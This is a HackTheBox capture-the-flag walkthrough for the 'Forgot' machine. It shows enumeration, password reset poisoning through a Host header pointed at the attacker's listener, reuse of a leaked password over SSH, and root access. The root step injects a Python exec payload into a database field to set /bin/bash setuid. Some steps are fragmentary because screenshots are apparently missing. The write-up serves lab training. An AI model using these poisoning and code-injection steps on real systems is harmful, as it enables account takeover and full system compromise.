HackTheBox – Forgot Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.188
Here we have a way to enumerate users (for instance, admin
exists):
If we take a look at the response headers, we see that the server uses Python (probably Flask) and there are references to Varnish:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl -I 10.10.11.188
Varnish is a web cache, as shown in www.varnish-software.com:
Actually, this is noticeable when requesting the same resource multiple times. The first response takes about 2 seconds to return, whereas the following requests to the same resources only take a few milliseconds:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl ‘10.10.11.188/forgot?username=admin’ -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl ‘10.10.11.188/forgot?username=admin’ -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl ‘10.10.11.188/forgot?username=admin’ -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl ‘10.10.11.188/forgot?username=asdf’ -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl ‘10.10.11.188/forgot?username=asdf’ -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# time curl ‘10.10.11.188/forgot?username=asdf’ -s >/dev/null
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ffuf -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://10.10.11.188/FUZZ
Password reset poisoning
Since there are no more functionalities in the website and common injections do not work (SQLi / NoSQLi), we need to do a bit of research. The name of the machine (“Forgot”) and the functionality to restore forgot passwords are hints to the attack we need to perform. There is a good post by portswigger.net explaining how password reset poisoning works.
The key is to enter our managed server IP address in the Host
header, so that the cache gets poisoned. Then, the legitimate user will go to our server with the reset token because the Host
header was poisoned:
Source: https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning
The attack seems simple. But first of all, we need to find a valid user different to admin
.
Unexpectedly, there was an HTML comment in the main page with a random user:
Let’s switch to curl
to poison the cache while listening on port 80 with nc
:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 80
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl ‘10.10.11.188/forgot?username=robert-dev-87120’ -H ‘Host: 10.10.14.75’
After a few seconds, we receive a hit in nc
:
Incredible, we have the password reset token. Let’s change the password then:
┌──(root㉿kali)-[/home/kali/Downloads]└─# curl ‘10.10.11.188/reset?token=MF4w1hJxE1UEomikyvZQs90ENtIXSwMbnFfn6zaVpMbkgwQllegKJobhMP31K5e1VfEpmDruujw9hyEat8juvA%3D%3D’ -d ‘password=asdf’
Now we click on send button and capture request.
to=Admin&link=http://10.10.11.188/static/sam.css&reason=&issue=Getting error while accessing search feature in enterprise platform.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl -I http://10.10.11.188/static/sam.css
Now copy the cookie value and update the cookie value on browser and then try to access /admin_ticket
Username:diego Password: dCb#1!x0%gjq
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh diego@10.10.11.188
diego@forgot:~$ sudo –l
We are able to run a Python script as root
with sudo
. This is such script:
diego@forgot:~$ cat /opt/security/ml_security.py
Everything is correct, so we can’t get easy code execution by modifying the script or serializing some malicious payload with pickle
. There are no Library Hijacking options either since sudo
resets tne environment variables.
Code injection
The script is related to Machine Learning, but there is a suspicious function being used:
Yes, preprocess_input_exprs_arg_string
. This function comes from tensorflow
, and doesn’t look to be related with Machine Learning. In fact, if we search a bit, we will find that this function is vulnerable to code injection. More information at security.snyk.io.
Indeed, the version of tensorflow
is vulnerable:
diego@forgot:~$ pip freeze | grep tensorflow
The injection occurs in that function because it uses eval
. Therefore, we can run arbitrary Python code as root
(because we are using sudo
).
The variable called data
comes fron the database:
diego@forgot:~$ mysql –user=diego –password=’dCb#1!x0%gjq’ –database=app
mysql> show databases;
mysql> use app;
mysql> show tables;
mysql> insert into escalate (reason) values (‘x = exec(“””__import__(“os”).system(“chmod 4755 /bin/bash”)”””)’);
mysql> exit
Now we will run the script with sudo
and successfully change /bin/bash
permissions:
diego@forgot:~$ ls -l /bin/bash
diego@forgot:~$ sudo /opt/security/ml_security.py
diego@forgot:~$ ls -l /bin/bash
diego@forgot:~$ bash –p
@SAKSHAM DIXIT
I needs to spend some time learning much more or understanding more.